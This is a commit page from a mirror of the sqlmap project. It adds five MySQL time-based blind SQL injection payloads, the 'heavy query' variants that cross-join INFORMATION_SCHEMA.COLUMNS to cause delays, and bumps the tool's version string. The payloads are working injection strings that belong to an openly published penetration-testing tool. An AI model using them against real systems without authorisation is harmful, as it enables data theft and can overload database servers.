sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-05-26 00:33:14 +03:00
Code Issues Packages Projects Releases Wiki Activity

Adding proper heavy query payload for MySQL

Browse Source
This commit is contained in:
Miroslav Stampar 2021-11-16 23:27:22 +01:00
parent 8d98347a43
commit 4cc6afe0fc
2 changed files with 103 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

102
data/xml/payloads/time_blind.xml
View File

@ -188,6 +188,26 @@
</details> </details>
</test> </test>
<test>
<title>MySQL &gt; 5.0.12 AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>3</level>
<risk>2</risk>
<clause>1,2,3,8,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.12</dbms_version>
</details>
</test>
<test> <test>
<title>MySQL &lt; 5.0.12 OR time-based blind (BENCHMARK)</title> <title>MySQL &lt; 5.0.12 OR time-based blind (BENCHMARK)</title>
<stype>5</stype> <stype>5</stype>
@ -208,6 +228,26 @@
</details> </details>
</test> </test>
<test>
<title>MySQL &gt; 5.0.12 OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.12</dbms_version>
</details>
</test>
<test> <test>
<title>MySQL &lt; 5.0.12 AND time-based blind (BENCHMARK - comment)</title> <title>MySQL &lt; 5.0.12 AND time-based blind (BENCHMARK - comment)</title>
<stype>5</stype> <stype>5</stype>
@ -229,6 +269,27 @@
</details> </details>
</test> </test>
<test>
<title>MySQL &gt; 5.0.12 AND time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
<comment>#</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.12</dbms_version>
</details>
</test>
<test> <test>
<title>MySQL &lt; 5.0.12 OR time-based blind (BENCHMARK - comment)</title> <title>MySQL &lt; 5.0.12 OR time-based blind (BENCHMARK - comment)</title>
<stype>5</stype> <stype>5</stype>
@ -250,6 +311,27 @@
</details> </details>
</test> </test>
<test>
<title>MySQL &gt; 5.0.12 OR time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
<comment>#</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.12</dbms_version>
</details>
</test>
<test> <test>
<title>MySQL &gt;= 5.0.12 RLIKE time-based blind</title> <title>MySQL &gt;= 5.0.12 RLIKE time-based blind</title>
<stype>5</stype> <stype>5</stype>
@ -1519,6 +1601,26 @@
</details> </details>
</test> </test>
<test>
<title>MySQL &gt; 5.0.12 time-based blind - Parameter replace (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
<request>
<payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.12</dbms_version>
</details>
</test>
<test> <test>
<title>MySQL time-based blind - Parameter replace (bool)</title> <title>MySQL time-based blind - Parameter replace (bool)</title>
<stype>5</stype> <stype>5</stype>

2
lib/core/settings.py
View File

@ -20,7 +20,7 @@ from thirdparty import six
from thirdparty.six import unichr as _unichr from thirdparty.six import unichr as _unichr
# sqlmap version (<major>.<minor>.<month>.<monthly commit>) # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.5.11.6" VERSION = "1.5.11.7"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)